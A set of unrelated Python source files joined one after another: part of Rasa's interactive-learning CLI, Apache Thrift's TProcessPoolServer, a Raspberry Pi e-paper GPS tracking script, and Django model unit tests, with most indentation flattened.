def _merge_annotated_and_original_entities(parse_annotated, parse_original):
# overwrite entities which have already been
# annotated in the original annotation to preserve
# additional entity parser information
entities = parse_annotated.get("entities", [])[:]
for i, entity in enumerate(entities):
for original_entity in parse_original.get("entities", []):
if _is_same_entity_annotation(entity, original_entity):
entities[i] = original_entity
break
return entities
def _is_same_entity_annotation(entity, other):
return entity["value"] == other["value"] and entity["entity"] == other["entity"]
async def _enter_user_message(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Request a new message from the user."""
question = questionary.text("Your input ->")
message = await _ask_questions(question, sender_id, endpoint, lambda a: not a)
if message == (INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART):
raise RestartConversation()
await send_message(endpoint, sender_id, message)
async def is_listening_for_message(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Check if the conversation is in need for a user message."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.APPLIED)
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") == UserUttered.type_name:
return False
elif e.get("event") == ActionExecuted.type_name:
return e.get("name") == ACTION_LISTEN_NAME
return False
async def _undo_latest(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Undo either the latest bot action or user message, whatever is last."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.ALL)
# Get latest `UserUtterance` or `ActionExecuted` event.
last_event_type = None
for i, e in enumerate(reversed(tracker.get("events", []))):
last_event_type = e.get("event")
if last_event_type in {ActionExecuted.type_name, UserUttered.type_name}:
break
elif last_event_type == Restarted.type_name:
break
if last_event_type == ActionExecuted.type_name:
undo_action = ActionReverted().as_dict()
await send_event(endpoint, sender_id, undo_action)
elif last_event_type == UserUttered.type_name:
undo_user_message = UserUtteranceReverted().as_dict()
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
await send_event(
endpoint, sender_id, [undo_user_message, listen_for_next_message]
)
async def _fetch_events(
sender_ids: List[Union[Text, List[Event]]], endpoint: EndpointConfig
) -> List[List[Event]]:
"""Retrieve all event trackers from the endpoint for all sender ids."""
event_sequences = []
for sender_id in sender_ids:
if isinstance(sender_id, str):
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
for conversation in _split_conversation_at_restarts(events):
parsed_events = rasa.core.events.deserialise_events(conversation)
event_sequences.append(parsed_events)
else:
event_sequences.append(sender_id)
return event_sequences
async def _plot_trackers(
sender_ids: List[Union[Text, List[Event]]],
output_file: Optional[Text],
endpoint: EndpointConfig,
unconfirmed: Optional[List[Event]] = None,
):
"""Create a plot of the trackers of the passed sender ids.
This assumes that the last sender id is the conversation we are currently
working on. If there are events that are not part of this active tracker
yet, they can be passed as part of `unconfirmed`. They will be appended
to the currently active conversation."""
if not output_file or not sender_ids:
# if there is no output file provided, we are going to skip plotting
# same happens if there are no sender ids
return None
event_sequences = await _fetch_events(sender_ids, endpoint)
if unconfirmed:
event_sequences[-1].extend(unconfirmed)
graph = await visualize_neighborhood(
event_sequences[-1], event_sequences, output_file=None, max_history=2
)
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
"""Print some initial help message for the user."""
if not skip_visualization:
visualization_url = DEFAULT_SERVER_FORMAT.format(
"http", DEFAULT_SERVER_PORT + 1
)
visualization_help = "Visualisation at {}/visualization.html.".format(
visualization_url
)
else:
visualization_help = ""
rasa.cli.utils.print_success(
"Bot loaded. {}\n"
"Type a message and press enter "
"(press 'Ctr-c' to exit). "
"".format(visualization_help)
)
async def record_messages(
endpoint: EndpointConfig,
sender_id: Text = UserMessage.DEFAULT_SENDER_ID,
max_message_limit: Optional[int] = None,
stories: Optional[Text] = None,
skip_visualization: bool = False,
):
"""Read messages from the command line and print bot responses."""
from rasa.core import training
try:
_print_help(skip_visualization)
try:
domain = await retrieve_domain(endpoint)
except ClientError:
logger.exception(
"Failed to connect to Rasa Core server at '{}'. "
"Is the server running?".format(endpoint.url)
)
return
trackers = await training.load_data(
stories,
Domain.from_dict(domain),
augmentation_factor=0,
use_story_concatenation=False,
)
intents = [next(iter(i)) for i in (domain.get("intents") or [])]
num_messages = 0
sender_ids = [t.events for t in trackers] + [sender_id]
if not skip_visualization:
plot_file = "story_graph.dot"
await _plot_trackers(sender_ids, plot_file, endpoint)
else:
plot_file = None
while not utils.is_limit_reached(num_messages, max_message_limit):
try:
if await is_listening_for_message(sender_id, endpoint):
await _enter_user_message(sender_id, endpoint)
await _validate_nlu(intents, endpoint, sender_id)
await _predict_till_next_listen(
endpoint, sender_id, sender_ids, plot_file
)
num_messages += 1
except RestartConversation:
await send_event(endpoint, sender_id, Restarted().as_dict())
await send_event(
endpoint, sender_id, ActionExecuted(ACTION_LISTEN_NAME).as_dict()
)
logger.info("Restarted conversation, starting a new one.")
except UndoLastStep:
await _undo_latest(sender_id, endpoint)
await _print_history(sender_id, endpoint)
except ForkTracker:
await _print_history(sender_id, endpoint)
events_fork = await _request_fork_from_user(sender_id, endpoint)
await send_event(endpoint, sender_id, Restarted().as_dict())
if events_fork:
for evt in events_fork:
await send_event(endpoint, sender_id, evt)
logger.info("Restarted conversation at fork.")
await _print_history(sender_id, endpoint)
await _plot_trackers(sender_ids, plot_file, endpoint)
except Abort:
return
except Exception:
logger.exception("An exception occurred while recording messages.")
raise
def _serve_application(app, stories, skip_visualization):
"""Start a core server and attach the interactive learning IO."""
endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)
async def run_interactive_io(running_app: Sanic):
"""Small wrapper to shut down the server once cmd io is done."""
await record_messages(
endpoint=endpoint,
stories=stories,
skip_visualization=skip_visualization,
sender_id=uuid.uuid4().hex,
)
logger.info("Killing Sanic server now.")
running_app.stop() # kill the sanic server
app.add_task(run_interactive_io)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT)
return app
def start_visualization(image_path: Text = None) -> None:
"""Add routes to serve the conversation visualization files."""
app = Sanic(__name__)
# noinspection PyUnusedLocal
@app.exception(NotFound)
async def ignore_404s(request, exception):
return response.text("Not found", status=404)
# noinspection PyUnusedLocal
@app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
def visualisation_html(request):
return response.file(visualization.visualization_html_path())
# noinspection PyUnusedLocal
@app.route("/visualization.dot", methods=["GET"])
def visualisation_png(request):
try:
headers = {"Cache-Control": "no-cache"}
return response.file(os.path.abspath(image_path), headers=headers)
except FileNotFoundError:
return response.text("", 404)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(args, endpoints, additional_arguments, app, loop):
_interpreter = NaturalLanguageInterpreter.create(args.get("nlu"), endpoints.nlu)
model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))
_agent = await train(
args.get("domain"),
args.get("stories"),
model_directory,
_interpreter,
endpoints,
args.get("dump_stories"),
args.get("config")[0],
None,
additional_arguments,
)
app.agent = _agent
async def wait_til_server_is_running(endpoint, max_retries=30, sleep_between_retries=1):
"""Try to reach the server, retry a couple of times and sleep in between."""
while max_retries:
try:
r = await retrieve_status(endpoint)
logger.info("Reached core: {}".format(r))
if not r.get("is_ready"):
# server did not finish loading the agent yet
# in this case, we need to wait till the model trained
# so we might be sleeping for a while...
await asyncio.sleep(sleep_between_retries)
continue
else:
# server is ready to go
return True
except ClientError:
max_retries -= 1
if max_retries:
await asyncio.sleep(sleep_between_retries)
return False
def run_interactive_learning(
stories: Text = None,
skip_visualization: bool = False,
server_args: Dict[Text, Any] = None,
additional_arguments: Dict[Text, Any] = None,
):
"""Start the interactive learning with the model of the agent."""
global SAVE_IN_E2E
server_args = server_args or {}
if server_args.get("nlu_data"):
PATHS["nlu"] = server_args["nlu_data"]
if server_args.get("stories"):
PATHS["stories"] = server_args["stories"]
if server_args.get("domain"):
PATHS["domain"] = server_args["domain"]
SAVE_IN_E2E = server_args["e2e"]
if not skip_visualization:
p = Process(target=start_visualization, args=("story_graph.dot",))
p.daemon = True
p.start()
else:
p = None
app = run.configure_app(enable_api=True)
endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))
# before_server_start handlers make sure the agent is loaded before the
# interactive learning IO starts
if server_args.get("model"):
app.register_listener(
partial(run.load_agent_on_start, server_args.get("model"), endpoints, None),
"before_server_start",
)
else:
app.register_listener(
partial(train_agent_on_start, server_args, endpoints, additional_arguments),
"before_server_start",
)
_serve_application(app, stories, skip_visualization)
if not skip_visualization and p is not None:
p.terminate() # pytype: disable=attribute-error
p.join() # pytype: disable=attribute-error
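# Illustrative sketch only (not part of the original module): a minimal,
# never-called example of how this entry point might be invoked from a script.
# All file paths and the model archive name are placeholders.
def _example_run_interactive_learning() -> None:
    run_interactive_learning(
        stories="data/stories.md",
        skip_visualization=False,
        server_args={
            "model": "models/core.tar.gz",
            "stories": "data/stories.md",
            "nlu_data": "data/nlu.md",
            "domain": "domain.yml",
            "e2e": False,
        },
    )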
|
TProcessPoolServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
from multiprocessing import Process, Value, Condition
from lib.thrift.server import TServer
from thrift.transport.TTransport import TTransportException
class TProcessPoolServer(TServer):
"""Server with a fixed size pool of worker subprocesses to service requests
Note that if you need shared state between the handlers - it's up to you!
Written by Dvir Volk, doat.com
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.numWorkers = 10
self.workers = []
self.isRunning = Value('b', False)
self.stopCondition = Condition()
self.postForkCallback = None
def setPostForkCallback(self, callback):
if not callable(callback):
raise TypeError("This is not a callback!")
self.postForkCallback = callback
def setNumWorkers(self, num):
"""Set the number of worker threads that should be created"""
self.numWorkers = num
def workerProcess(self):
"""Loop getting clients from the shared queue and process them"""
if self.postForkCallback:
self.postForkCallback()
while self.isRunning.value:
try:
client = self.serverTransport.accept()
self.serveClient(client)
except (KeyboardInterrupt, SystemExit):
return 0
            except Exception as x:
logging.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
        except TTransportException as tx:
pass
        except Exception as x:
logging.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start workers and put into queue"""
# this is a shared state that can tell the workers to exit when False
self.isRunning.value = True
# first bind and listen to the port
self.serverTransport.listen()
# fork the children
for i in range(self.numWorkers):
try:
w = Process(target=self.workerProcess)
w.daemon = True
w.start()
self.workers.append(w)
            except Exception as x:
logging.exception(x)
# wait until the condition is set by stop()
while True:
self.stopCondition.acquire()
try:
self.stopCondition.wait()
break
except (SystemExit, KeyboardInterrupt):
break
            except Exception as x:
logging.exception(x)
self.isRunning.value = False
def stop(self):
self.isRunning.value = False
self.stopCondition.acquire()
self.stopCondition.notify()
self.stopCondition.release()
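# Illustrative sketch only (not part of the original module): typical Thrift
# wiring for this server class. `MyService` and `MyHandler` are hypothetical
# stand-ins for a generated service and its handler implementation.
#
#     from thrift.transport import TSocket, TTransport
#     from thrift.protocol import TBinaryProtocol
#
#     processor = MyService.Processor(MyHandler())
#     transport = TSocket.TServerSocket(port=9090)
#     tfactory = TTransport.TBufferedTransportFactory()
#     pfactory = TBinaryProtocol.TBinaryProtocolFactory()
#
#     server = TProcessPoolServer(processor, transport, tfactory, pfactory)
#     server.setNumWorkers(4)
#     server.serve()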
|
app_tracker.py
|
#!/usr/bin/env python3
from __future__ import print_function
import os
import sys
import string
from papirus import Papirus
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from time import sleep
import RPi.GPIO as GPIO
from datetime import datetime
import threaded_get_gps_from_port as tggp
import threading
def collect_gps(papirus,SIZE):
# thread to open a new file, start writing and spawn the
# other thread to collect gps data from the port.
# Start tracking.
write_text(papirus, "Beginning tracking...", SIZE)
location_file = '/home/pi/location'+datetime.now().strftime('%Y%m%d%H%M%S')+'.txt'
gpsp = tggp.GpsPoller()
gpsp.start()
gps_attribs = ['time','alt','lon','lat']
while True:
try:
with open(location_file,'a+') as lf:
result = gpsp.get_current_value()
if all(getattr(result,attr) for attr in gps_attribs):
lf.write(str(result.alt)+","+str(result.lat)+","+str(result.lon)+","+str(result.time)+"\n")
            # in this worker thread, log a GPS fix roughly every 5 seconds
sleep(5)
except AttributeError:
sleep(2)
except KeyboardInterrupt:
quit()
# Check EPD_SIZE is defined
EPD_SIZE=0.0
if os.path.exists('/etc/default/epd-fuse'):
exec(open('/etc/default/epd-fuse').read())
if EPD_SIZE == 0.0:
print("Please select your screen size by running 'papirus-config'.")
sys.exit()
# Running as root only needed for older Raspbians without /dev/gpiomem
if not (os.path.exists('/dev/gpiomem') and os.access('/dev/gpiomem', os.R_OK | os.W_OK)):
user = os.getuid()
if user != 0:
print('Please run script as root')
sys.exit()
# Command line usage:
#   app_tracker.py [rotation]
hatdir = '/proc/device-tree/hat'
WHITE = 1
BLACK = 0
SIZE = 27
# Assume Papirus Zero
SW1 = 21
SW2 = 16
SW3 = 20
SW4 = 19
SW5 = 26
# Check for HAT, and if detected redefine SW1 .. SW5
if (os.path.exists(hatdir + '/product')) and (os.path.exists(hatdir + '/vendor')) :
with open(hatdir + '/product') as f :
prod = f.read()
with open(hatdir + '/vendor') as f :
vend = f.read()
if (prod.find('PaPiRus ePaper HAT') == 0) and (vend.find('Pi Supply') == 0) :
# Papirus HAT detected
SW1 = 16
SW2 = 26
SW3 = 20
SW4 = 21
SW5 = -1
def main(argv):
global SIZE
GPIO.setmode(GPIO.BCM)
GPIO.setup(SW1, GPIO.IN)
GPIO.setup(SW2, GPIO.IN)
GPIO.setup(SW3, GPIO.IN)
GPIO.setup(SW4, GPIO.IN)
if SW5 != -1:
GPIO.setup(SW5, GPIO.IN)
papirus = Papirus(rotation = int(argv[0]) if len(sys.argv) > 1 else 0)
# Use smaller font for smaller displays
if papirus.height <= 96:
SIZE = 12
papirus.clear()
write_text(papirus, "Ready... 1 + 2 to exit.\n1 to start GPS\n2 to stop GPS\n4 to restart\n5 to shutdown", SIZE)
TRACKING = False
while True:
# Exit when SW1 and SW2 are pressed simultaneously
if (GPIO.input(SW1) == False) and (GPIO.input(SW2) == False) :
write_text(papirus, "Exiting ...", SIZE)
sleep(0.2)
papirus.clear()
sys.exit()
if GPIO.input(SW1) == False:
if TRACKING:
write_text(papirus, "GPS already logging.\nPress 2 to stop", SIZE)
else:
# Start tracking
g = threading.Thread(target=collect_gps,args=(papirus,SIZE,),daemon=True)
g.start()
TRACKING = True
if GPIO.input(SW2) == False:
if TRACKING:
# Stop tracking
g.join()
TRACKING = False
write_text(papirus, "Tracking ended.", SIZE)
else:
write_text(papirus, "No current GPS logging.\nPress 1 to start", SIZE)
if GPIO.input(SW3) == False:
write_text(papirus, "Three", SIZE)
if GPIO.input(SW4) == False:
write_text(papirus, "Rebooting...", SIZE)
os.system("sudo reboot")
if (SW5 != -1) and (GPIO.input(SW5) == False):
write_text(papirus, "Shutting Down at\n" + str(datetime.now()), SIZE)
os.system("sudo shutdown now -h")
sleep(0.1)
def write_text(papirus, text, size):
# initially set all white background
image = Image.new('1', papirus.size, WHITE)
# prepare for drawing
draw = ImageDraw.Draw(image)
font = ImageFont.truetype('/usr/share/fonts/truetype/freefont/FreeMonoBold.ttf', size)
# Calculate the max number of char to fit on line
line_size = (papirus.width / (size*0.65))
current_line = 0
text_lines = [""]
# Compute each line
for word in str(text).split():
# If there is space on line add the word to it
if (len(text_lines[current_line]) + len(word)) < line_size:
text_lines[current_line] += " " + word
else:
# No space left on line so move to next one
text_lines.append("")
current_line += 1
text_lines[current_line] += " " + word
current_line = 0
for l in text_lines:
current_line += 1
draw.text( (0, ((size*current_line)-size)) , l, font=font, fill=BLACK)
papirus.display(image)
papirus.partial_update()
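# Worked example (not part of the original script; figures are approximate):
# on a 2.7 inch PaPiRus (264 px wide) with the default font size 27,
# line_size is roughly 264 / (27 * 0.65) ~= 15 characters per line, so longer
# messages wrap onto several lines before being drawn.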
if __name__ == '__main__':
try:
main(sys.argv[1:])
except KeyboardInterrupt:
sys.exit('interrupted')
|
tests.py
|
from __future__ import unicode_literals
import threading
import warnings
from datetime import datetime, timedelta
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections
from django.db.models.fields import Field
from django.db.models.fields.related import ForeignObjectRel
from django.db.models.manager import BaseManager
from django.db.models.query import EmptyQuerySet, QuerySet, ValuesListQuerySet
from django.test import (
TestCase, TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature,
)
from django.utils import six
from django.utils.translation import ugettext_lazy
from .models import Article, ArticleSelectOnSave, SelfRef
class ModelInstanceCreationTests(TestCase):
def test_object_is_not_written_to_database_until_save_was_called(self):
a = Article(
id=None,
headline='Area man programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertIsNone(a.id)
self.assertEqual(Article.objects.all().count(), 0)
# Save it into the database. You have to call save() explicitly.
a.save()
self.assertIsNotNone(a.id)
self.assertEqual(Article.objects.all().count(), 1)
def test_can_initialize_model_instance_using_positional_arguments(self):
"""
You can initialize a model instance using positional arguments,
which should match the field order as defined in the model.
"""
a = Article(None, 'Second article', datetime(2005, 7, 29))
a.save()
self.assertEqual(a.headline, 'Second article')
self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))
def test_can_create_instance_using_kwargs(self):
a = Article(
id=None,
headline='Third article',
pub_date=datetime(2005, 7, 30),
)
a.save()
self.assertEqual(a.headline, 'Third article')
self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))
def test_autofields_generate_different_values_for_each_instance(self):
a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
self.assertNotEqual(a3.id, a1.id)
self.assertNotEqual(a3.id, a2.id)
def test_can_mix_and_match_position_and_kwargs(self):
# You can also mix and match position and keyword arguments, but
# be sure not to duplicate field information.
a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Fourth article')
def test_cannot_create_instance_with_invalid_kwargs(self):
six.assertRaisesRegex(
self,
TypeError,
"'foo' is an invalid keyword argument for this function",
Article,
id=None,
headline='Some headline',
pub_date=datetime(2005, 7, 31),
foo='bar',
)
def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
"""
You can leave off the value for an AutoField when creating an
object, because it'll get filled in automatically when you save().
"""
a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Article 5')
self.assertNotEqual(a.id, None)
def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
a = Article(pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Default headline')
def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
"""as much precision in *seconds*"""
a1 = Article(
headline='Article 7',
pub_date=datetime(2005, 7, 31, 12, 30),
)
a1.save()
self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date,
datetime(2005, 7, 31, 12, 30))
a2 = Article(
headline='Article 8',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a2.save()
self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45))
def test_saving_an_object_again_does_not_create_a_new_object(self):
a = Article(headline='original', pub_date=datetime(2014, 5, 16))
a.save()
current_id = a.id
a.save()
self.assertEqual(a.id, current_id)
a.headline = 'Updated headline'
a.save()
self.assertEqual(a.id, current_id)
def test_querysets_checking_for_membership(self):
headlines = [
'Area man programs in Python', 'Second article', 'Third article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
a = Article(headline='Some headline', pub_date=some_pub_date)
a.save()
# You can use 'in' to test for membership...
self.assertIn(a, Article.objects.all())
# ... but there will often be more efficient ways if that is all you need:
self.assertTrue(Article.objects.filter(id=a.id).exists())
class ModelTest(TestCase):
def test_objects_attribute_is_only_available_on_the_class_itself(self):
six.assertRaisesRegex(
self,
AttributeError,
"Manager isn't accessible via Article instances",
getattr,
Article(),
"objects",
)
self.assertFalse(hasattr(Article(), 'objects'))
self.assertTrue(hasattr(Article, 'objects'))
def test_queryset_delete_removes_all_items_in_that_queryset(self):
headlines = [
'An article', 'Article One', 'Amazing article', 'Boring article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Amazing article>",
"<Article: An article>",
"<Article: Article One>",
"<Article: Boring article>"])
Article.objects.filter(headline__startswith='A').delete()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Boring article>"])
def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
some_pub_date = datetime(2014, 5, 16, 12, 1)
a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
self.assertNotEqual(a1, a2)
self.assertEqual(a1, Article.objects.get(id__exact=a1.id))
self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))
@skipUnlessDBFeature('supports_microsecond_precision')
def test_microsecond_precision(self):
# In PostgreSQL, microsecond-level precision is available.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(Article.objects.get(pk=a9.pk).pub_date,
datetime(2005, 7, 31, 12, 30, 45, 180))
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(
Article.objects.get(id__exact=a9.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45),
)
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported_edge_case(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a = Article.objects.create(
headline='Article',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertEqual(
Article.objects.get(pk=a.pk).pub_date,
datetime(2008, 12, 31, 23, 59, 59),
)
def test_manually_specify_primary_key(self):
# You can manually specify the primary key when creating a new object.
a101 = Article(
id=101,
headline='Article 101',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a101.save()
a101 = Article.objects.get(pk=101)
self.assertEqual(a101.headline, 'Article 101')
def test_create_method(self):
# You can create saved objects in a single step
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
self.assertEqual(Article.objects.get(headline="Article 10"), a10)
def test_year_lookup_edge_case(self):
# Edge-case test: A year lookup should retrieve all objects in
# the given year, including Jan. 1 and Dec. 31.
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008),
["<Article: Article 11>", "<Article: Article 12>"])
def test_unicode_data(self):
# Unicode data works, too.
a = Article(
headline='\u6797\u539f \u3081\u3050\u307f',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.get(pk=a.id).headline,
'\u6797\u539f \u3081\u3050\u307f')
def test_hash_function(self):
# Model instances have a hash function, so they can be used in sets
# or as dictionary keys. Two models compare as equal if their primary
# keys are equal.
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a11 = Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
a12 = Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
s = {a10, a11, a12}
self.assertIn(Article.objects.get(headline='Article 11'), s)
def test_field_ordering(self):
"""
Field instances have a `__lt__` comparison function to define an
ordering based on their creation. Prior to #17851 this ordering
comparison relied on the now unsupported `__cmp__` and was assuming
compared objects were both Field instances raising `AttributeError`
when it should have returned `NotImplemented`.
"""
f1 = Field()
f2 = Field(auto_created=True)
f3 = Field()
self.assertLess(f2, f1)
self.assertGreater(f3, f1)
self.assertIsNotNone(f1)
self.assertNotIn(f2, (None, 1, ''))
def test_extra_method_select_argument_with_dashes_and_values(self):
# The 'select' argument to extra() supports names with dashes in
# them, as long as you use values().
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
dicts = Article.objects.filter(
pub_date__year=2008).extra(
select={'dashed-value': '1'}).values('headline', 'dashed-value')
self.assertEqual([sorted(d.items()) for d in dicts],
[[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]])
def test_extra_method_select_argument_with_dashes(self):
# If you use 'select' with extra() and names containing dashes on a
# query that's *not* a values() query, those extra 'select' values
# will silently be ignored.
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
articles = Article.objects.filter(
pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
self.assertEqual(articles[0].undashedvalue, 2)
def test_create_relation_with_ugettext_lazy(self):
"""
Test that ugettext_lazy objects work when saving model instances
through various methods. Refs #10498.
"""
notlazy = 'test'
lazy = ugettext_lazy(notlazy)
Article.objects.create(headline=lazy, pub_date=datetime.now())
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# test that assign + save works with Promise objects
article.headline = lazy
article.save()
self.assertEqual(article.headline, notlazy)
# test .update()
Article.objects.update(headline=lazy)
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# still test bulk_create()
Article.objects.all().delete()
Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
def test_emptyqs(self):
# Can't be instantiated
with self.assertRaises(TypeError):
EmptyQuerySet()
self.assertIsInstance(Article.objects.none(), EmptyQuerySet)
def test_emptyqs_values(self):
# test for #15959
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
qs = Article.objects.none().values_list('pk')
self.assertIsInstance(qs, EmptyQuerySet)
self.assertIsInstance(qs, ValuesListQuerySet)
self.assertEqual(len(qs), 0)
def test_emptyqs_customqs(self):
# A hacky test for custom QuerySet subclass - refs #17271
Article.objects.create(headline='foo', pub_date=datetime.now())
class CustomQuerySet(QuerySet):
def do_something(self):
return 'did something'
qs = Article.objects.all()
qs.__class__ = CustomQuerySet
qs = qs.none()
with self.assertNumQueries(0):
self.assertEqual(len(qs), 0)
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(qs.do_something(), 'did something')
def test_emptyqs_values_order(self):
# Tests for ticket #17712
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().filter(
id__in=Article.objects.values_list('id', flat=True))), 0)
@skipUnlessDBFeature('can_distinct_on_fields')
def test_emptyqs_distinct(self):
# Tests for #19426
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)
def test_ticket_20278(self):
sr = SelfRef.objects.create()
with self.assertRaises(ObjectDoesNotExist):
SelfRef.objects.get(selfref=sr)
def test_eq(self):
self.assertEqual(Article(id=1), Article(id=1))
self.assertNotEqual(Article(id=1), object())
self.assertNotEqual(object(), Article(id=1))
a = Article()
self.assertEqual(a, a)
self.assertNotEqual(Article(), a)
def test_hash(self):
# Value based on PK
self.assertEqual(hash(Article(id=1)), hash(1))
with self.assertRaises(TypeError):
# No PK value -> unhashable (because save() would then change
# hash)
hash(Article())
class ModelLookupTest(TestCase):
def setUp(self):
# Create an Article.
self.a = Article(
id=None,
headline='Area woman programs in Python',
pub_date=datetime(2005, 7, 28),
)
# Save it into the database. You have to call save() explicitly.
self.a.save()
def test_all_lookup(self):
# Change values by changing the attributes, then calling save().
self.a.headline = 'Area man programs in Python'
self.a.save()
# Article.objects.all() returns all the articles in the database.
self.assertQuerysetEqual(Article.objects.all(),
['<Article: Area man programs in Python>'])
def test_rich_lookup(self):
# Django provides a rich database lookup API.
self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline__startswith='Area woman'), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
